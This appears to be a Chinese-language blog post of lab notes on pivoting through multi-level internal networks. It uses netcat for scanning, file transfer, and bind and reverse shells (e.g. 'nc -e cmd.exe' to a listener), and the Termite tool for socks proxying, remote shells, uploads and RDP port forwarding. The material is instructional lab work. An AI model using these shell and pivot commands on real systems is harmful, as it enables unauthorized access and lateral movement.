03.msf縱向滲透多級網路穿透

NC工具的使用
內網穿透工具termite
SSH代理使用
MSF穿越多級網路
埠復用

PART 1: NC及穿透內網工具使用 本地要ngrok轉發才行

Nc使用詳解
tcp監聽
nc可以作為server端啟動一個tcp的監聽，默認情況下下面監聽的是一個tcp的埠
nc -l -p 9999
客戶端測驗
1、在B機器上telnet A機器此埠，如下顯示表示B機器可以訪問A機器此埠
telnet 10.0.1.161 9999
2、B機器上也可以使用nmap掃描A機器的此埠
nmap 10.0.1.161 -p9999
3、使用nc命令作為客戶端工具進行埠探測
nc -vz -w 2 10.0.1.161 9999
（-v可視化，-z掃描時不發送資料，-w超時幾秒，后面跟數字）
服務端會自動關閉監聽，
4、nc可以掃描連續埠，這個作用非常重要，常常可以用來掃描服務器埠，然后給服務器安全加固
在客戶端B機器上掃描連續的兩個埠，如下
nc -vzw 2 10.0.1.161 9998-9999

Nc傳檔案
方法1，先啟動接收命令
使用nc傳輸檔案還是比較方便的，因為不用scp和rsync那種輸入密碼的操作了
把A機器上的一個rpm檔案發送到B機器上
需注意操作次序，receiver先偵聽埠，sender向receiver所在機器的該埠發送資料，
步驟1，先在B機器上啟動一個接收檔案的監聽，格式如下
意思是把賴在9995埠接收到的資料都寫到file檔案里（這里檔案名隨意取）
格式：nc -l port >file
nc -l -p 9995 >zabbix.rpm
步驟2，在A機器上往B機器的9995埠發送資料，把下面rpm包發送過去
nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm
方法2，先啟動發送命令
步驟1，先在B機器上，啟動發送檔案命令
下面命令表示通過本地的9992埠發送test.mv檔案
nc -l -p 9992 <test.mv
步驟2，A機器上連接B機器，取接收檔案
下面命令表示通過連接B機器的9992埠接收檔案，并把檔案存到本目錄下，檔案名為test2.mv
nc 10.0.1.162 9992 >test2.mv

Nc反彈shell
方法1、REMOTE主機系結SHELL
在公網監聽
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
或者
nc -l -p 5555 -t -e cmd.exe
在內網主動建立連接
nc -nvv 192.168.153.138 5555
-t是通過telne模式執行 cmd.exe 程式，可以省略，
講解：系結REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
方法2、REMOTE主機系結SHELL并反向連接
在公網監聽
nc -lp 5555
在內網機器反彈
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
或者
nc -t -e cmd 192.168.153.140 5555
講解：系結REMOTE主機的CMDSHELL并反向連接到192.168.x.x的TCP5354埠

---------------------------------------------------------------------------------
模擬:鏈接和掃描

NC可以上傳檔案,下載檔案,shell,電子取證,也可以建立連接聊天
還可掃埠 類似與nmap
NC屬于cs架構,客戶端,服務端
Linux也可以連接windows
windows工具在內網安全nc里
模擬:
把nc放進目標虛擬機
在把nc放進物理機

目標03機
是命令列的:nc.exe -l -p 12345 //-l是偵聽 -p是埠

物理機nc
nc.exe 目標地址 目標所偵聽的埠
注意這種聊天是沒加密的,需要加密就得安裝安全套接層.ssh加密之類的

埠掃描
物理機掃描虛擬機:
nc -vz -w 2 10.0.1.161 9999
nc -vzw 2 10.0.1.161 9998-9999

--------------
模擬上傳檔案
客戶端傳服務端
目標機輸入:
格式：nc -l port >file
nc -l -p 9995 >zabbix.rpm //在目標機偵聽埠,接受物理機(vps)的檔案并保存到zabbix.rpm格式,大于號代表接受文本保存格式

客戶機輸入
nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm 小于號代表傳輸檔案

服務端傳客戶端
目標機輸入
nc -l -p 9992 <test.mv

客戶機輸入
nc 10.0.1.162 9992 >test2.mv
如果客戶機偵聽,目標機來鏈接,客戶機啟動鏈接我的就會發送檔案,那么目標機防火墻就不會攔截
----------------------------------------------------------
以下是新的工具
PART 2: termite工具使用
工具在內網安全Termite
termite
程式地址, http://rootkiter.com/Termite/
一款極度小巧靈活的跳板機,有別于傳統socks代理,它對于復雜內網環境下的滲透適用性更強,操作也極為簡便
程式分為兩部分,admin[為控制端]和agent[為代理端節點],admin和agent所有選項用途均一致
-l 指定本地socks埠,等待遠程連
-c 指定遠程socks機器ip
-p 指定遠程socks機器埠

管理端叫admin
服務端為agent
不同的系統服務端直接運行即可

win10物理機
03:橋接/vm1 169.254.38.181/192.168.25.129
win7:vm1/vm2 192.168.25.128/ 192.168.18.129
xp:vm2 192.168.18.128
把服務端agent_win32.exe放到桌面

test
1. 以服務模式啟動一個agent服務，
> $ ./agent -l 8888
2. 令管理端連接到agent并對agent進行管理，
> $ ./admin -c 127.0.0.1 -p 8888
3. 此時，admin端會得到一個內置的shell, 輸入help指令可以得到幫助資訊，
>> help
4. 通過show指令可以得到當前agent的拓撲情況，
>> show
0M
+-- 1M
由于當前拓撲中只有一個agent，所以展示結果只有 1M ,
其中1 為節點的ID號，
M為MacOS系統的簡寫，Linux為L，Windows簡寫為W，
5. 將新agent加入當前拓撲
> ./agent -c 127.0.0.1 -p 8888
6. 此時show指令將得到如下效果
0M
+-- 1M
| +-- 2M
這表明，當前拓撲中有兩個節點，其中由于2節點需要通過1節點才能訪問，所以下掛在1節點下方，

模擬:
03:橋接/vm1 路徑轉到桌面 agent_Win32.exe -l 6666 //偵聽上6666
win7:vm1/vm2 agent_Win32.exe -l 7777
xp:vm2 agent_Win32.exe -l 8888

第一步.物理機鏈接03 admin_win32.exe -c 169.254.38.181 -p 6666
第二步 show 查看會話
第三部 goto 1 //選擇鏈接03
第四部 connect 192.168.25.128 7777
第五步 goto 2
第六步 connect 192.168.18.128 8888
管理成功

可以執行
socks代理
埠轉發
shll
上傳下載
show 查看會話,help幫助

上傳檔案upfile d:\1.txt 1.txt

呼叫shell: shell 1188 會在我本地開個埠
在本地打開cmd:nc 127.0.0.1 1188 // 得借助nc

linux有個工具叫proxychains
termite創建socks 1080
本地安裝prixychains驅動nmap掃描其他內網,就會把我的流量轉發給xp
由xp來掃描整個網路

埠轉發
lcxtran [lport] [rhost] [rport]
把xp的內網地址和3389轉發到我這里1234埠
在用本地的stic連接本地的3389 就等于連接xp的3389

也可以反向連接 xp連接win7 ,win7連接03 , 物理機鏈接03,前提win7 xp 03開啟偵聽和主動偵聽,可以過防火墻

linux放進去服務端
chmod 777 agent_linux_i586
./agent_linux_i586 -l 1133
物理機正常鏈接linux即可

標籤：其他

上一篇：03.msf縱向滲透多級網路穿透

下一篇：分享一顆USB轉4串口芯片